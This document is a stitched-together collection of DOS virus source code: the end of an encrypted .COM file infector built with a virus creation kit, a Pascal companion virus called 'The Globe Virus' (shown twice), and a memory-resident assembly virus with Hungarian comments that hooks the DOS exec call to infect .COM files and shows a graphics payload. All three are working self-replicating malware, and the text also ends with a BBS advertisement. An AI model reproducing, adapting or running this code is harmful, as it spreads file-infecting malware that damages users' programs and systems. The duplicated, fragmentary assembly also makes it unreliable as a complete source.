done_searching: mov sp,bp ; Restore old stack frame
mov ah,01Ah ; DOS set DTA function
pop dx ; Retrieve old DTA address
int 021h
pop bp ; Restore BP
ret ; Return to caller
up_dir db "..",0 ; Parent directory name
all_files db "*.*",0 ; Directories to search for
com_mask db "*.COM",0 ; Mask for all .COM files
traverse endp
db 0A6h,03Ch,0B6h,078h,0CCh
find_files proc near
push bp ; Save BP
mov ah,02Fh ; DOS get DTA function
int 021h
push bx ; Save old DTA address
mov bp,sp ; BP points to local buffer
sub sp,128 ; Allocate 128 bytes on stack
push dx ; Save file mask
mov ah,01Ah ; DOS set DTA function
lea dx,[bp - 128] ; DX points to buffer
int 021h
mov ah,04Eh ; DOS find first file function
mov cx,00100111b ; CX holds all file attributes
pop dx ; Restore file mask
find_a_file: int 021h
jc done_finding ; Exit if no files found
call infect_file ; Infect the file!
jnc done_finding ; Exit if no error
mov ah,04Fh ; DOS find next file function
jmp short find_a_file ; Try finding another file
done_finding: mov sp,bp ; Restore old stack frame
mov ah,01Ah ; DOS set DTA function
pop dx ; Retrieve old DTA address
int 021h
pop bp ; Restore BP
ret ; Return to caller
find_files endp
db 002h,0EFh,034h,048h,091h
infect_file proc near
mov ah,02Fh ; DOS get DTA address function
int 021h
mov si,bx ; SI points to the DTA
mov byte ptr [di + set_carry],0 ; Assume we'll fail
cmp word ptr [si + 01Ah],(65279 - (finish - start))
jbe size_ok ; If it's small enough continue
jmp infection_done ; Otherwise exit
size_ok: mov ax,03D00h ; DOS open file function, r/o
lea dx,[si + 01Eh] ; DX points to file name
int 021h
xchg bx,ax ; BX holds file handle
mov ah,03Fh ; DOS read from file function
mov cx,3 ; CX holds bytes to read (3)
lea dx,[di + buffer] ; DX points to buffer
int 021h
mov ax,04202h ; DOS file seek function, EOF
cwd ; Zero DX _ Zero bytes from end
mov cx,dx ; Zero CX /
int 021h
xchg dx,ax ; Faster than a PUSH AX
mov ah,03Eh ; DOS close file function
int 021h
xchg dx,ax ; Faster than a POP AX
sub ax,finish - start + 3 ; Adjust AX for a valid jump
cmp word ptr [di + buffer + 1],ax ; Is there a JMP yet?
je infection_done ; If equal then exit
mov byte ptr [di + set_carry],1 ; Success -- the file is OK
add ax,finish - start ; Re-adjust to make the jump
mov word ptr [di + new_jump + 1],ax ; Construct jump
mov ax,04301h ; DOS set file attrib. function
xor cx,cx ; Clear all attributes
lea dx,[si + 01Eh] ; DX points to victim's name
int 021h
mov ax,03D02h ; DOS open file function, r/w
int 021h
xchg bx,ax ; BX holds file handle
mov ah,040h ; DOS write to file function
mov cx,3 ; CX holds bytes to write (3)
lea dx,[di + new_jump] ; DX points to the jump we made
int 021h
mov ax,04202h ; DOS file seek function, EOF
cwd ; Zero DX _ Zero bytes from end
mov cx,dx ; Zero CX /
int 021h
push si ; Save SI through call
call encrypt_code ; Write an encrypted copy
pop si ; Restore SI
mov ax,05701h ; DOS set file time function
mov cx,[si + 016h] ; CX holds old file time
mov dx,[si + 018h] ; DX holds old file date
int 021h
mov ah,03Eh ; DOS close file function
int 021h
mov ax,04301h ; DOS set file attrib. function
xor ch,ch ; Clear CH for file attribute
mov cl,[si + 015h] ; CX holds file's old attributes
lea dx,[si + 01Eh] ; DX points to victim's name
int 021h
infection_done: cmp byte ptr [di + set_carry],1 ; Set carry flag if failed
ret ; Return to caller
set_carry db ? ; Set-carry-on-exit flag
buffer db 090h,0CDh,020h ; Buffer to hold old three bytes
new_jump db 0E9h,?,? ; New jump to virus
infect_file endp
db 089h,043h,03Bh,054h,0AAh
get_weekday proc near
mov ah,02Ah ; DOS get date function
int 021h
cbw ; Sign-extend AL into AX
ret ; Return to caller
get_weekday endp
data00 db "*.GIF",0
vcl_marker db "[Z10]",0 ; VCL creation marker
note db "Bye Bye Mr.GIF",0
db "You'll never find all the file"
db "s I have infected!",0
encrypt_code proc near
push bp ; Save BP
mov bp,di ; Use BP as pointer to code
lea si,[bp + encrypt_decrypt]; SI points to cipher routine
xor ah,ah ; BIOS get time function
int 01Ah
mov word ptr [si + 9],dx ; Low word of timer is new key
xor byte ptr [si + 1],8 ;
xor byte ptr [si + 8],1 ; Change all SIs to DIs
xor word ptr [si + 11],0101h; (and vice-versa)
lea di,[bp + finish] ; Copy routine into heap
mov cx,finish - encrypt_decrypt - 1 ; All but final RET
push si ; Save SI for later
push cx ; Save CX for later
rep movsb ; Copy the bytes
lea si,[bp + write_stuff] ; SI points to write stuff
mov cx,5 ; CX holds length of write
rep movsb ; Copy the bytes
pop cx ; Restore CX
pop si ; Restore SI
inc cx ; Copy the RET also this time
rep movsb ; Copy the routine again
mov ah,040h ; DOS write to file function
lea dx,[bp + start] ; DX points to virus
lea si,[bp + finish] ; SI points to routine
call si ; Encrypt/write/decrypt
mov di,bp ; DI points to virus again
pop bp ; Restore BP
ret ; Return to caller
write_stuff: mov cx,finish - start ; Length of code
int 021h
encrypt_code endp
end_of_code label near
encrypt_decrypt proc near
lea si,[bp + start_of_code] ; SI points to code to decrypt
mov cx,(end_of_code - start_of_code) / 2 ; CX holds length
xor_loop: db 081h,034h,00h,00h ; XOR a word by the key
inc si ; Do the next word
inc si ;
loop xor_loop ; Loop until we're through
ret ; Return to caller
encrypt_decrypt endp
finish label near
code ends
end main
+106
@@ -0,0 +1,106 @@
Program Worm;
{$M 2048,0,4096}
Uses Dos, Crt;
Var F1 : File;
F2 : File;
O : String;
Parm : String;
P : DirStr;
N : NameStr;
E : ExtStr;
Buf : Array[0..8000] of Byte;
NumRead : Word;
NumWritten : Word;
DirInfo : SearchRec;
ComExist : SearchRec;
Infect : Byte;
Procedure StartOrigExe;
Begin
O := ParamStr(0);
FSplit(O,P,N,E);
O := P+N+'.EXE';
P := '';
For NumRead := 1 To ParamCount Do
P := P + ParamStr(NumRead);
SwapVectors;
Exec(O,P);
SwapVectors;
End;
Procedure InfectExe;
Begin
FindFirst('*.EXE',Archive,DirInfo);
While (DosError = 0) And (Infect <> 0) Do
Begin
FSplit(DirInfo.Name,P,N,E);
O := P+N+'.COM';
FindFirst(O,Hidden,ComExist);
If DosError <> 0 Then
Begin
Assign(F1,O);
Rewrite(F1,1);
BlockWrite(F1,buf,NumRead,NumWritten);
Close(F1);
SetFattr(F1,Hidden);
Dec(Infect);
End;
FindNext(DirInfo);
End;
End;
Procedure Activate;
Var
T1,T2 : Integer;
I : Real;
X , Y : Byte;
Resolution : Integer;
Begin
ClrScr;
I := 0;
T2 := 38;
Randomize;
Repeat
Resolution := 50;
For T1 := 0 to Resolution Do
Begin
X := Abs(40+Round(Sin(I)*T2));
Y := Abs(12-Round(Cos(I)*10));
GotoXY(X,Y);
Write('Û');
I := I + ((Pi*2)/Resolution);
End;
T2 := T2 - 1;
TextColor(Random(14)+1);
Until T2 < 2;
GotoXY(30,12);
TextColor(White);
Write('* The Globe Virus *');
Asm
Mov Ah,8
Int 21h
End;
ClrScr;
End;
Begin
Infect := 3;
Randomize;
Assign(F2,ParamStr(0));
Reset(F2,1);
BlockRead(F2,buf,SizeOf(buf),NumRead);
Close(F2);
InfectExe;
StartOrigExe;
If Random(16) = 0 then Activate;
Halt(DosExitCode);
End.
; ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
; ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ> and Remember Don't Forget to Call <ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
; ÄÄÄÄÄÄÄÄÄÄÄÄ> ARRESTED DEVELOPMENT +31.79.426o79 H/P/A/V/AV/? <ÄÄÄÄÄÄÄÄÄÄ
; ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
+106
@@ -0,0 +1,106 @@
Program Worm;
{$M 2048,0,4096}
Uses Dos, Crt;
Var F1 : File;
F2 : File;
O : String;
Parm : String;
P : DirStr;
N : NameStr;
E : ExtStr;
Buf : Array[0..8000] of Byte;
NumRead : Word;
NumWritten : Word;
DirInfo : SearchRec;
ComExist : SearchRec;
Infect : Byte;
Procedure StartOrigExe;
Begin
O := ParamStr(0);
FSplit(O,P,N,E);
O := P+N+'.EXE';
P := '';
For NumRead := 1 To ParamCount Do
P := P + ParamStr(NumRead);
SwapVectors;
Exec(O,P);
SwapVectors;
End;
Procedure InfectExe;
Begin
FindFirst('*.EXE',Archive,DirInfo);
While (DosError = 0) And (Infect <> 0) Do
Begin
FSplit(DirInfo.Name,P,N,E);
O := P+N+'.COM';
FindFirst(O,Hidden,ComExist);
If DosError <> 0 Then
Begin
Assign(F1,O);
Rewrite(F1,1);
BlockWrite(F1,buf,NumRead,NumWritten);
Close(F1);
SetFattr(F1,Hidden);
Dec(Infect);
End;
FindNext(DirInfo);
End;
End;
Procedure Activate;
Var
T1,T2 : Integer;
I : Real;
X , Y : Byte;
Resolution : Integer;
Begin
ClrScr;
I := 0;
T2 := 38;
Randomize;
Repeat
Resolution := 50;
For T1 := 0 to Resolution Do
Begin
X := Abs(40+Round(Sin(I)*T2));
Y := Abs(12-Round(Cos(I)*10));
GotoXY(X,Y);
Write('Û');
I := I + ((Pi*2)/Resolution);
End;
T2 := T2 - 1;
TextColor(Random(14)+1);
Until T2 < 2;
GotoXY(30,12);
TextColor(White);
Write('* The Globe Virus *');
Asm
Mov Ah,8
Int 21h
End;
ClrScr;
End;
Begin
Infect := 3;
Randomize;
Assign(F2,ParamStr(0));
Reset(F2,1);
BlockRead(F2,buf,SizeOf(buf),NumRead);
Close(F2);
InfectExe;
StartOrigExe;
If Random(16) = 0 then Activate;
Halt(DosExitCode);
End.
; ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
; ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ> and Remember Don't Forget to Call <ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
; ÄÄÄÄÄÄÄÄÄÄÄÄ> ARRESTED DEVELOPMENT +31.79.426o79 H/P/A/V/AV/? <ÄÄÄÄÄÄÄÄÄÄ
; ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
+895
@@ -0,0 +1,895 @@
CODE segment para public 'code'
assume cs:code,ds:code,es:nothing,ss:nothing
org 100h
egy equ 1 ; one
dma equ 0b0h
atvar equ 300 ; at paramaeter
xtvar equ 1 ; xt parameter
suruseg equ 255 ; density
idotartalek equ 18*30 ; time delay
start: db 0e9h,0,0
;##################### Initialization ######################
resid: push ax
mov cx,offset memory - offset begin ;#### decoding ####
mov bx,ds:[101h]
add bx,103h+(offset begin-offset resid)
jhg1: xor byte ptr [bx],0
inc bx
loop jhg1
begin: sub bx,(offset begin-offset resid)+(offset memory - offset begin)
mov cs:[0feh],bx
mov ax,[bx+(offset eltarol-offset resid)]
mov cl,[bx+(offset eltarol-offset resid)+2]
mov ds:[100h],ax
mov ds:[102h],cl
mov cx,0b800h
mov ah,15
push bx
int 10h
pop bx
cmp al,7
jne rety
mov ch,0b0h
rety: mov [bx+(offset ruut - offset resid)+1],cx
mov word ptr [bx+(offset counter-offset resid)],idotartalek
mov byte ptr [bx+(offset jammed-offset resid)+1],al
mov byte ptr [bx+(offset vanesik-offset resid)],0
xor ax,ax
mov ds,ax
cmp word ptr ds:[130h],4142h
je zipp
mov ds:[130h],4142h
mov ax,cs
dec ax
mov ds,ax
mov ax,ds:[3]
sub ax,180h
mov ds:[3],ax
add ax,ds:[1]
mov es,ax
push cs
pop ds
sub word ptr ds:[2],384
mov di,3
mov si,bx
mov cx,(offset memory-offset resid) shr 1 +1
cld
rep movsw
mov ax,es
sub ax,10h
mov ds,ax
mov dx,offset irq
mov ax,251ch
int 21h
mov ah,2ah
int 21h
cmp al,1
jne zipp
dec al
out 0a0h,al
mov al,dma
out 41h,al
zipp:
mov ax,cs
mov ds,ax
mov es,ax
pop ax
push cs
mov cx,100h
push cx
mov cx,ds:[0feh]
sub cx,100h
retf
eltarol dw 20cdh
eltarol2 db 90h
;######################### Vyrus activated ##########################
csik: mov ax,0e000h
mov ds,ax
csiky: mov ds:[0],al
inc al
jmp csiky
;######################### propagation part ##########################
eredeti: db 0eah ; original
int211 dw 0
int212 dw 0
counter dw 0
szaporodas: cmp ah,4bh
jne eredeti
or al,al
jnz eredeti
push ax
push es
push bx
push ds
push dx
mov bx,dx
koj: inc bx
cmp byte ptr [bx],'.'
jne koj
cmp byte ptr[bx+1],'C'
jne kiugras1
mov cs:kds,ds
mov cs:kdx,dx
mov cs:kbx,bx
call probe
kiugras1: pop dx
pop ds
pop bx
pop es
pop ax
jmp eredeti
kds dw 0
kdx dw 0
kbx dw 0
kkk dw 0
fszam dw 0
probe: push cs
pop es
mov di,offset memory
mov si,dx
mov cx,40
cld
rep movsw
mov bx,0ff0h
mov ah,48h
int 21h
jnc juk1
ret
;!!!!! memoria lefoglalva (kkk = Seg)
atr dw 0
juk1: mov cs:kkk,ax
mov dx,offset memory
push ds
pop es
mov bx,cs:kbx
mov byte ptr [bx+1],'A'
call elorutin
push cs
pop ds ;DS:DX a masolt nev.
mov ax,4300h
int 21h
mov atr,cx
xor cx,cx
mov ax,4301h
int 21h
;!!!!! Attr allitas
cmp cs:attrflag,0
jz juk2
mov ds,cs:kds
jmp memoff
juk2: mov di,kdx ;ES:DI a regi nev atirva
mov ah,56h
int 21h
call utorutin ;!!!!! Atnevezve
mov dx,cs:kdx
push es
pop ds
mov ax,3d02h
int 21h ;!!!!! File megnyitva
mov cs:fszam,ax
mov ds,cs:kkk
xor dx,dx
mov bx,ax
mov cx,0fc00h-(offset memory-offset resid)
mov ah,3fh
int 21h
cmp ax,0fc00h-(offset memory-offset resid)
;!!!!! Beolvasva a program (csak a hossza miatt)
je hosszu ;zarjuk le a file-t
cmp ax,7580
jb hosszu ;tul rovid a file
mov di,ax
mov bx,ds:[1]
cmp word ptr [bx+3],0b950h
;$$$$$$$$$$$$$$$$$$$$$$$$$ FUCK OFF TASM,MASM $$$$$$$$$$$$$$$$$$$$$$$$$$$
je hosszu
push di
mov cx,(offset memory-offset resid)
mov si,offset resid
push ds
pop es
push cs
pop ds
inc byte ptr ds:[offset jhg1 +2]
mov ax,es:[0]
mov eltarol,ax
mov al,es:[2]
mov eltarol2,al
rep movsw ;!!!!! Atmasolva (hehe)
mov al,byte ptr ds:[offset jhg1 +2]
pop di
add di,(offset begin-offset resid)
mov cx,offset memory - offset begin ;#### coding ####
jhga: xor byte ptr es:[di],al
inc di
loop jhga
sub di,(offset memory - offset resid)
push di ;Az ugrasi hely
mov bx,fszam
mov cx,offset memory - offset begin
mov dx,di
push es
pop ds
mov ah,40h
int 21h
pop di
cmp ax,offset memory - offset begin
je ghj1
hosszu: jmp zardle
ghj1: ;!!!!! Kiirva a vege
mov byte ptr ds:[0],0e9h
sub di,3
mov ds:[1],di
mov bx,cs:fszam
xor cx,cx
xor dx,dx
mov ax,4200h
push bx
int 21h
pop bx
mov cx,3
xor dx,dx
mov ah,40h
int 21h
zardle: mov bx,cs:fszam
mov ah,3eh
int 21h ;!!!!! File lezarva
push cs
pop es
mov di,offset memory
mov ds,cs:kds
mov dx,cs:kdx
mov ah,56h
int 21h ;!!!!! File visszanevezve
mov bx,cs:kbx
mov byte ptr ds:[bx+1],'C'
mov ax,4301h
mov cx,cs:atr
int 21h ;!!!!! attr visszaall
memoff: mov bx,cs:kbx
mov byte ptr ds:[bx+1],'C'
push cs
pop ds
mov es,cs:kkk
mov ah,49h
int 21h ;!!!!! Memoria visszaalt
ret
it241 dw 0
it242 dw 0
attrflag db 0
elorutin: mov cs:attrflag,0
xor ax,ax
mov ds,ax
mov ax,ds:[90h]
mov cs:it241,ax
mov ax,ds:[92h]
mov cs:it242,ax
mov ds:[90h],offset it24
mov ds:[92h],cs
ret
utorutin: xor ax,ax
mov ds,ax
mov ax,cs:it241
mov ds:[90h],ax
mov ax,cs:it242
mov ds:[92h],ax
ret
it24: mov cs:attrflag,1
xor al,al
iret
vanesik db 0
irq: cli
push ds
push es
push ax
push bx
push cx
push dx
push si
push di
cmp cs:counter,0
je sabad
dec cs:counter
jne sabad
xor ax,ax
mov ds,ax
mov ax,ds:[84h]
mov cs:int211,ax
mov ax,ds:[86h]
mov cs:int212,ax
mov ds:[84h],offset szaporodas
mov ds:[86h],cs
sabad: cmp cs:vanesik,0
je keress
call idovan
jmp jumper
keress: call ruut
jumper: pop di
pop si
pop dx
pop cx
pop bx
pop ax
pop es
pop ds
iret
idovan: xor ah,ah
int 1ah
and dx,suruseg
jne rutyi
call action
rutyi: ret
ruut: mov ax,0b800h
mov es,ax
mov di,cs:did
mov cx,512
cld
poke: jcxz huy
mov al,'E'
repnz scasb
jz talalt
huy: cmp di,4095
jb kisebb
mov cs:did,0
ret
kisebb: add cs:did,512
ret
did dw 0
talalt: test di,1
jz poke
mov dl,es:[di+1]
mov dh,es:[di+3]
or dx,2020h
cmp dx,6973h ;'is'
jne poke
mov bl,es:[di+5]
or bl,20h
cmp bl,'k'
jne poke
mov cs:vanesik,1
jmp huy
action: mov ax,cs
mov ds,ax
mov es,ax
mov vanesik,0
mov pontszam,1
mov si,offset zizi
mov di,offset novi
cld
mov cx,6
rep movsw
call zoldseg
jammed: mov ax,3
int 10h
cmp counterr,atvar
jne fdr
push cs
pop es
lea bx,mess
mov ax,1301h
mov bx,1
xor dx,dx
mov cx,offset drt-offset mess
int 10h
fdr: ret
counterr dw 0
zoldseg: cli
mov di,offset memory
xor ax,ax
cld
mov cx,200*3
rep stosw
mov ah,0c0h
mov si,3333h
int 15h
cmp si,3333h
mov ax,xtvar
je xt
mov ax,atvar
xt: mov counterr,ax
mov ax,3502h
int 21h
cmp bx,0e9eh
jne ibm
call init1
mov pontm,100
mov port,22h
jmp entry
ibm: ;Ibm bulik
mov pontm,200
mov al,70h
mov port,60h ;%
mov ah,15
int 10h
cmp al,7
jne cga
call init3
jmp entry
cga: call init2
jmp entry
port dw 22h
pontm dw 100
init1: mov ax,200h
mov es,ax
xor di,di
mov cx,4000h
cld
xor ax,ax
rep stosw
mov plotdw,offset plot
mov unplotdw,offset unplot
ret
init2: mov ax,0b800h
mov es,ax
mov ax,6
int 10h
mov plotdw,offset plotcga
mov unplotdw,offset unplotcga
ret
init3: mov ax,0b000h
mov es,ax
call prog
mov plotdw,offset plotherc
mov unplotdw,offset unplotcga
ret
prog: mov dx,3bfh
mov al,3
out dx,al
mov al,28h
mov dx,3b8h
out dx,al
mov ah,0
mov cx,12
lea bx,ports
lopi1: mov dx,03b4h
mov al,ah
out dx,al
inc ah
mov dx,03b5h
mov al,[bx]
out dx,al
inc bx
loop lopi1
mov dx,3bfh
mov al,3
out dx,al
mov dx,3b8h
mov al,0ah
out dx,al
xor di,di
mov cx,4000h
xor ax,ax
cld
rep stosw
ret
ports db 35h,2dh,2eh,7,5bh,2,57h,57h,2,3,0,0
;**************************** Forgatorutin ************************************
even
sina dw 0
cosa dw 0 ;si-t meghagyja
sinb dw 0
cosb dw 0
pontszam dw 1
transzform: ;be: di=X, bx=Y, cx=Z, SINA,COSA,SINB,COSB
; add bx,ytol ;ez itt jolesz
shl di,1
shl bx,1 ;X es Y elokeszitese a szorzashoz
mov ax,di
imul cosa
mov bp,dx
mov ax,bx
imul sina
add bp,dx ; bp=X' = cosa*X + sina*Y
mov ax,bx
imul cosa
mov bx,dx
mov ax,di
imul sina
sub bx,dx ; bx=Y' = cosa*X - sina*Y
shl bp,1
shl cx,1 ;X' es Z elokeszitese
mov ax,bp
imul cosb
mov di,dx
mov ax,cx
imul sinb
sub di,dx ; di=X'' = cosb*X' - sinb*Z
mov cx,di
mov ax,bx
ret
comment @
mov ax,cx
imul cosb
mov cx,dx
mov ax,bp
imul sinb
add cx,dx ; cx=Z'' = cosb*Z = sinb*X'
; out: di=X'' bx=Y'' cx=Z''
mov dx,keptav
;****************************** PERSPEKTIVA **********************************
mov ax,di
shl ax,1
imul tavol
mov cx,dx
mov ax,bx
shl ax,1
imul tavol
mov ax,dx
ret ; ki : CX=X' AX=Y'
@
plotherc: ; al=y cx=x
xor ah,ah
mov dx,ax
shr dx,1
add ax,dx
mov dx,cx
mov cl,al
and cl,3
shr ax,1
shr al,1
mov di,2000h
shl di,cl
mov cl,90
mul cl
add di,ax
mov ax,dx
mov cx,dx
jmp ezisi
plotcga: xor di,di
shr ax,1
jnc tryp
mov di,2000h
tryp: mov dl,80
mul dl
add di,ax
mov ax,cx
ezisi: shr ax,1
shr ax,1
shr ax,1
add di,ax
and cl,7
mov al,128
shr al,cl
or es:[di],al
jmp ezis1
unplotcga: mov al,[bx]
mov di,[bx+1]
xor al,255
and es:[di],al
ret
plot: ;AL = y koord. cx = x koord.
mov dl,160
mul dl
mov di,ax
mov ax,cx
shr ax,1
shr ax,1
add di,ax
and di,-2
and cl,7
mov al,128
shr al,cl
or es:[di+egy],al
ezis1: mov [bx],al
inc bx
mov [bx],di
add bx,2
ret
unplot: mov al,[bx]
mov di,[bx+1]
xor al,255
and es:[di+egy],al
ret
kezdfazisrajz: mov bx,offset memory
mov si,offset gombdata
mov cx,pontszam
ck1: push cx
lodsw
mov cx,ax
shl cx,1
add cx,320
lodsw
add si,2
add ax,50
call word ptr [plotdw]
pop cx
loop ck1
ret
indy db 0
fazisrajz: mov bx,offset memory
mov si,offset gombdata
mov cx,pontszam
mov indy,1
ck12: push cx
call word ptr [unplotdw]
push bx
lodsw
mov di,ax
lodsw
mov bx,ax
lodsw
mov cx,ax
call transzform
pop bx
add ax,50
mov di,bxpo
add al,[di]
shl cx,1
add cx,bxpo2
cmp indy,0
je ruty
mov indy,0
cmp karal2,0
jne ruty
push cx
push ax
inc cx
call word ptr [plotdw]
pop ax
pop cx
sub bx,3
ruty: call word ptr [plotdw]
pop cx
loop ck12
ret
novpont: mov ax,pontm
cmp pontszam,ax
je trew
mov cx,pontm
sub cx,pontszam
mov ch,cl
shR cx,1
shr cx,1
yut: loop yut
inc pontszam
ret
trew: call movie
mov bx,bxpo
cmp bx,offset patt
je valto
cmp bx,offset patt+29
je valto
iuy: add bx,novi
mov bxpo,bx
ret
valto: neg novi
jmp iuy
novi dw -1
bxpo dw offset patt
bxpo2 dw 320
novi2 dw 4
karal dw 300
karal2 dw 600
zizi dw -1,offset patt,320,4,300,600
movie: cmp karal,0
je jesty
dec karal
ret
jesty: cmp karal2,0
je jesty2
dec karal2
jesty2: mov bx,bxpo2
cmp bx,100
je valto2
cmp bx,540
je valto2
iuy2: add bx,novi2
mov bxpo2,bx
ret
valto2: neg novi2
jmp iuy2
elokesz: call novpont
mov bl,szogx
xor bh,bh
shl bx,1
mov ax,sintabl[bx]
mov sina,ax
mov ax,costabl[bx]
mov cosa,ax
mov bl,szogy
xor bh,bh
shl bx,1
mov ax,sintabl[bx]
mov sinb,ax
mov ax,costabl[bx]
mov cosb,ax
mov al,szogxvalt
add szogx,al
mov al,szogyvalt
add szogy,al
ret
even
szogx db 0
szogy db 0
szogxvalt db 2
szogyvalt db 5
tavol dw 32767
phase: call elokesz
call fazisrajz
ret
entry: call kezdfazisrajz
rajta1: call phase
cmp pontm,100
je apc
cmp byte ptr ds:[offset ruut +2],0b8h
je ccggaa
mov cx,counterr
mov dx,3bah
qaz1: in al,dx
and al,1
jnz qaz1
qaz2: in al,dx
and al,1
jz qaz2
loop qaz1
jmp apc
ccggaa: mov dx,3dah
qaz3: in al,dx
and al,8
jnz qaz3
qaz4: in al,dx
and al,8
jz qaz4
apc: mov dx,port
in al,dx
and al,1
jz rajta1
ret
even
plotdw dw 0
unplotdw dw 0
sintabl dw 0, 804, 1608, 2410, 3212, 4011, 4808, 5602, 6393
dw 7179, 7962, 8739, 9512, 10278, 11039, 11793, 12539, 13279
dw 14010, 14732, 15446, 16151, 16846, 17530, 18204, 18868, 19519
dw 20159, 20787, 21403, 22005, 22594, 23170, 23731, 24279, 24811
dw 25329, 25832, 26319, 26790, 27245, 27683, 28105, 28510, 28898
dw 29268, 29621, 29956, 30273, 30571, 30852, 31113, 31356, 31580
dw 31785, 31971, 32137, 32285, 32412, 32521, 32609, 32678, 32728
dw 32757, 32767, 32757, 32728, 32678, 32609, 32521, 32412, 32285
dw 32137, 31971, 31785, 31580, 31356, 31113, 30852, 30571, 30273
dw 29956, 29621, 29268, 28898, 28510, 28105, 27683, 27245, 26790
dw 26319, 25832, 25329, 24811, 24279, 23731, 23170, 22594, 22005
dw 21403, 20787, 20159, 19519, 18868, 18204, 17530, 16846, 16151
dw 15446, 14732, 14010, 13279, 12539, 11793, 11039, 10278, 9512
dw 8739, 7962, 7179, 6393, 5602, 4808, 4011, 3212, 2410
dw 1608, 804, 0, -804, -1608, -2410, -3212, -4011, -4808
dw -5602, -6393, -7179, -7962, -8739, -9512,-10278,-11039,-11793
dw -12539,-13279,-14010,-14732,-15446,-16151,-16846,-17530,-18204
dw -18868,-19519,-20159,-20787,-21403,-22005,-22594,-23170,-23731
dw -24279,-24811,-25329,-25832,-26319,-26790,-27245,-27683,-28105
dw -28510,-28898,-29268,-29621,-29956,-30273,-30571,-30852,-31113
dw -31356,-31580,-31785,-31971,-32137,-32285,-32412,-32521,-32609
dw -32678,-32728,-32757,-32767,-32757,-32728,-32678,-32609,-32521
dw -32412,-32285,-32137,-31971,-31785,-31580,-31356,-31113,-30852
dw -30571,-30273,-29956,-29621,-29268,-28898,-28510,-28105,-27683
dw -27245,-26790,-26319,-25832,-25329,-24811,-24279,-23731,-23170
dw -22594,-22005,-21403,-20787,-20159,-19519,-18868,-18204,-17530
dw -16846,-16151,-15446,-14732,-14010,-13279,-12539,-11793,-11039
dw -10278, -9512, -8739, -7962, -7179, -6393, -5602, -4808, -4011
dw -3212, -2410, -1608, -804
costabl dw 32767, 32757, 32728, 32678, 32609, 32521, 32412, 32285
dw 32137, 31971, 31785, 31580, 31356, 31113, 30852, 30571
dw 30273, 29956, 29621, 29268, 28898, 28510, 28105, 27683
dw 27245, 26790, 26319, 25832, 25329, 24811, 24279, 23731
dw 23170, 22594, 22005, 21403, 20787, 20159, 19519, 18868
dw 18204, 17530, 16846, 16151, 15446, 14732, 14010, 13279
dw 12539, 11793, 11039, 10278, 9512, 8739, 7962, 7179
dw 6393, 5602, 4808, 4011, 3212, 2410, 1608, 804
dw 0, -804, -1608, -2410, -3212, -4011, -4808, -5602
dw -6393, -7179, -7962, -8739, -9512,-10278,-11039,-11793
dw -12539, -13279,-14010,-14732,-15446,-16151,-16846,-17530
dw -18204, -18868,-19519,-20159,-20787,-21403,-22005,-22594
dw -23170, -23731,-24279,-24811,-25329,-25832,-26319,-26790
dw -27245, -27683,-28105,-28510,-28898,-29268,-29621,-29956
dw -30273, -30571,-30852,-31113,-31356,-31580,-31785,-31971
dw -32137, -32285,-32412,-32521,-32609,-32678,-32728,-32757
dw -32767, -32757,-32728,-32678,-32609,-32521,-32412,-32285
dw -32137, -31971,-31785,-31580,-31356,-31113,-30852,-30571
dw -30273, -29956,-29621,-29268,-28898,-28510,-28105,-27683
dw -27245, -26790,-26319,-25832,-25329,-24811,-24279,-23731
dw -23170, -22594,-22005,-21403,-20787,-20159,-19519,-18868
dw -18204, -17530,-16846,-16151,-15446,-14732,-14010,-13279
dw -12539, -11793,-11039,-10278, -9512, -8739, -7962, -7179
dw -6393, -5602, -4808, -4011, -3212, -2410, -1608, -804
dw 0, 804, 1608, 2410, 3212, 4011, 4808, 5602
dw 6393, 7179, 7962, 8739, 9512, 10278, 11039, 11793
dw 12539, 13279, 14010, 14732, 15446, 16151, 16846, 17530
dw 18204, 18868, 19519, 20159, 20787, 21403, 22005, 22594
dw 23170, 23731, 24279, 24811, 25329, 25832, 26319, 26790
dw 27245, 27683, 28105, 28510, 28898, 29268, 29621, 29956
dw 30273, 30571, 30852, 31113, 31356, 31580, 31785, 31971
dw 32137, 32285, 32412, 32521, 32609, 32678, 32728, 32757
gombdata:
DW 44, 3, 22, 29, 6, 40, 7, 9, 48,-14, 12, 46
DW -33, 15, 33,-44, 18, 14,-44, 21, -7,-35, 24,-25
DW -19, 26,-37, 0, 29,-40, 17, 31,-34, 29, 34,-21
DW 33, 36, -5, 30, 38, 9, 20, 40, 20, 8, 42, 25
DW -3, 43, 23,-12, 45, 17,-16, 46, 8,-15, 47, 0
DW -11, 48, -5, -5, 49, -7, 0, 49, -6, 0, 49, -2
DW 0, 49, 0, -2, 49, 0, -6, 49, 0, -7, 49, -5
DW -5, 48,-11, 0, 47,-15, 8, 46,-16, 17, 45,-12
DW 23, 43, -3, 25, 42, 8, 20, 40, 20, 9, 38, 30
DW -5, 36, 33,-21, 34, 29,-34, 31, 17,-40, 29, 0
DW -37,26,-19,-25,24,-35,-7,21,-44,14,18,-44
DW 33,15,-33,46,12,-14,48,9,7,40,6,29
DW 22,3,44,0,0,49,-22,-3,44,-40,-6,29
DW -48,-9,7,-46,-12,-14,-33,-15,-33,-14,-18,-44
DW 7,-21,-44,25,-24,-35,37,-26,-19,40,-29,0
